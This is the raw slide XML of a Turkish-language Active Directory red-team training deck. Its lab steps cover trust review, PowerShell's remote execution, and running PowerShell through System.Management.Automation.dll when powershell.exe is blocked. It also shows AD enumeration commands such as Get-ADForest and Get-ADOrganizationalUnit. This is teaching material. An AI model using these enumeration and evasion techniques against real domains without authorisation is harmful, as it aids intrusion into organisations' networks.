            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Yapıları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34F3CDC-565C-AEA9-6011-4C6772B1F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650" y="1825625"/>
            <a:ext cx="7162699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499826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DF211-484B-AD07-25EE-BCA875E87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Uygulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> #5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82E53-4807-5DF7-7CA0-748631DF8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Domain Controller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucusu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>oturum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>açınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Active Directory Domains and Trusts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>uygulamasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>açınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Lab </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ortamındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yapılarını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>inceleyiniz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04539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F50E7-C59C-03C6-8336-58E3B27CB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Bilgi Toplama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35E2EA-2123-E841-0F0C-A8BD1CE8F3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>
          <a:xfrm>
            <a:off x="1417142" y="1825625"/>
            <a:ext cx="9357715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986308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ADEF0-CC9A-DFD1-8805-AE1CC6685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Powershell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CB4E1-1778-EE0B-C9BA-3AB52890B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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tarafından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Command Prompt(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)’ye </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geliştirilen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komut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>satırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>uygulamasıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> .NET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kütüphanesine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, WMI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> COM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objelerine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>direk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>erişim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sağlamaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nedenle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>esnek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yapıya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sahiptir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>WS-Management </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>protokolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>uzak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucuda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>komut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çalıştırma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yeteneğine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sahiptir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> System.Management.Automation.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kütüphanesini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanmaktadır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93787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4FFDB-1497-4874-10E8-4A8EC353A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Önemli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Not – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell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08C44-2E6D-46B0-F0BA-9C30A03EB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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>altyapısı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Powershell.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Powershell_ise.exe’den</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bağımsız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şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çalıştırılabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nedenle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucuda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yukarıdaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>exeler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çalıştırılamazsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dahi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>komutları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çalıştırılabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Eğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> System.Management.Automation.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kütüphanesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanılarak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exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>oluşturulursa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>komutları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çalıştırılabilir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88752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7AEAD-FEFA-5604-30D7-E43F998C8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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Active Directory Module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3BE0C-CA25-654A-6A6C-7333AC8DE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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>modülü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tarafından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geliştirilmiş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunuculara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> RSAT (Remote Server Administration Tools) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>özelliği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yüklenebilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>modül</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sayesinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ortamındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>birçok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>önemli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kolaylıkla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>elde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>edilebilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Modülün</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> RSAT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>komut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>satırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yüklenebilmesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yerel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yönetici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (local admin) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gerekmektedir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21463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63443-B2E8-A85A-E567-8F108AE26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Uygulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> #6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2C352-1CD1-4F3A-9EB7-CB1CCAC45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• AD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sunucusu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oturum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>açınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. • https://github.com/forestallio/ActiveDirectoryRedTeaming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reposundaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Microsoft Active Directory Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>klasöründeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>işlemleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gerçekleştirerek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>modülünü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yükleyiniz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26554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D25F2-87DF-01AD-D2E1-FF51A611C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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Active Directory Module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A3581-6D46-5659-24A4-75CCEA2FA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# Forest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bilgilerini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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elde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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etmek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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>için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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kullanılır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</a:p>
          <a:p>
            <a:pPr lvl="1"/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Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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ADForest</a:t>
            </a:r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  <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bilgilerini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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elde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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etmek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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>için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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kullanılır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</a:p>
          <a:p>
            <a:pPr lvl="1"/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Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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ADDomain</a:t>
            </a:r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  <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tüm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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OU'ları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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listeler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</a:p>
          <a:p>
            <a:pPr lvl="1"/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Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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ADOrganizationalUnit</a:t>
            </a:r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-Filter * </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tüm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 err="1">
                <a:solidFill>
